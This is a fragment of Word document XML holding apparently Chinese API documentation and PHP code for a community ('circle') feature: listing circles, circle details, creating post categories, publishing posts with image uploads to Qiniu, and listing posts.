    <w:p w14:paraId="7CE879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7D9B0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3F22F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3CAAA5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98960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264109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2820B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0B3E0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66B33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4F5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1606D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1ED002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paginate($per_page, false, ['page' =&gt; $page,])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE63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363AA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s['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E51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s['data'] as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A18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img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEB6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img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FECE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54CC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img'] = _imgUrl() . $circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D775A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E6C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type'] = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FB2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circle['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE5A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50E57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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D929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C792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circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DC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5C7222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2193A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386283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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36622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 &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4AAF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key]['follow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4876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E81A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4FF2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2889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2B2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data'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2B7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CD2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s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0B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5B02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882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info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270BF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社区详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A46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EAB8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50228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1EDD3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circle_id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必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28583B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用户社区详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA51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社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CD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用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046738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社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F06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rticle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009B1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_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3D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已关注社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0C7F82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12C56E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3B22B4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4C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4371C7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FEA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 = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0F1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15907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id', $circle_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D519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43D0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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589E9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img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5F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img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1E2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B504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img'] = _imgUrl() . $circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32720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62AA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num = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020E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185BE1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7F22F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article_num'] = $article_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410579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r_num = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D05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30A09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1AE67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789C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er_num'] = $follower_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA304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num != $circle['article_num'] || $follower_num != $circle['follower_num']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5E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circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47202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37C51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num' =&gt; $article_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F922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r_num' =&gt; $follower_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A8D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7E97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872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99CA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circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E2CB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2FAA7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396B32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60787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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094DC6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 &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5AB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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455A60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7289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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE17E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B32D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8D4A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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5FC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DB92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48B4D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F3000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社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81A5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1BB2B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4AE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C31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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7E6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6145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B0E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create_article_type </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建社区动态分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9FA0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创建社区动态分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0B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54FD5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7005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2C010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tle     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态分类名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D452A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社区动态分类描述说明（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C7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社区动态分类创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D18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社区动态分类创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F0F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2B962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8635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reate_article_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ADA6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E630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FD76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62A7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创建社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686A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738C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1EE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B55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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4CA4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title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661E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48839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分类名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C0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D6D1A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9E4C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FA3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type = Db::name('circle_article_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D20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data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F2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2DDAF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article_type)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E7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7759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同名社区动态分类已存在，请更换社区动态分类名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C01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3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8962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8318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497B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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D008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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957A8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02F0AD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type_id = Db::name('circle_article_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662ACD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132D6B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type_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070E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6E11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社区动态分类创建成功，请等待后台审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54700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803F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9FD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F141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分类创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F4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5B8F17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A30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668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AF6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article_types </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区动态分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB2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社区动态分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21777D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00D0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E195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Json} result        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F0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社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A402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社区动态分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F93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社区动态分类描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B687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ircle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6E9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546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types()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AD2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B08D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types = Db::name('circle_article_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730C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446B5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4C2F0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_article_types) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C1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_article_types as $key =&gt; $circle_article_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B946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types[$key]['article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633E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circle_article_type['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202711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5CFF6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247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0C7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circle_article_types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76217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1F7A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B561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publish_article </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布社区动态｜用户动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CB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发布社区动态｜用户动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F830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15545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F614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124A3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ircle_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：为空时，则为用户动态）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D12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社区动态内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD0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description </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态内容描述（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74711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File} images        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图列表（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB6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社区动态｜用户动态创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE19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社区动态｜用户动态创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4DC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53CD7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185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ublish_article()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22915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0832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19382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33034A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57EC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2796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发布社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF1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2B765D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FD9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21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id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5071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51EC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社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59E616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AF9A6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758E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EFB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ircle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15767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7E12E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601C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_id'] = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C2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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCD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amp;&amp; $data['type_id'] != '' &amp;&amp; $data['title'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5D2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 = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E6ED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data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C8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data['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA2B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data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00413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13E5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article)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F695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912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同名的社区动态已存在，请更换动态标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DC9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3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A4A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671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2DE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713C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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552E67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input('param.description', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705173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lick'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC4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_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C826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i_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A845D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num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2E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hare_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CABE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amp;&amp; $data['type_id'] != '') { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD10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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106597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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24716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2E9B9C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D15A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547DA7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amp;&amp; $data['type_id'] != '' &amp;&amp; $data['title'] != '' &amp;&amp; $data['description'] == '' &amp;&amp; $data['content']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73832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substr(strip_tags($data['content']), 0, 70) . '...';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09208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15F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_keys = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330F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file('images')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC0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s = request()-&gt;file('images');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317667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iles as $file) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B1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10B38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52BC5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DDF8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241C0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639D37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6E6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714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ension = pathinfo($file-&gt;getInfo('name'), PATHINFO_EXTENSION); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FD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ensions = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D685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_array($extension, $extensions)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7F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975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64609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code' =&gt; 202,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D9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7E2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BC7E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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54B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704EA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name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuAk')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13803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name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuSk')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39962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4FD225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name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuBucket')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0729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name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuUrl')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D20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19A0B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44C71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23C89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61B9C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02F88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err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88FD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46CEE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F7C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D15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_keys[] = $ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A79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CC7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1656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0E74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 = join(',', $image_keys);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60988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id = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DED6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3DD8BE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id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F087D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ircle_id'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD3A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75C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39AA0C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article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB748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5176D5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data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F676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81D3A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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CD6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在您所创建的社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】发布了新的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5B2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circle['member_id'], $content, '', '', $data['circle_id'], $circle_article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656AD9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311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6A6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532A8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动态创建成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364F2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A9B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F0C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9101D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4A4E6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社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71AF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4D557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D7BF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DE4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E94DA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动态创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F877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B46C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8E8E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069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8C9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articles </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区动态｜会员动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B16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社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C6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1405F8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4226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75F27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circle_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：用于查看某社区动态）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC0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member_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定会员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：用于查看某会员动态）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56913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ype_ids     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（多个分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之间以英文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分隔）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEA2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s_top       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否置顶贴：</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非必填：值为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，获得置顶社区动态列表）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613868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is_selected  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否精华贴：</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非必填：值为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，获得精华社区动态列表）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D8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24E83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er_page     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
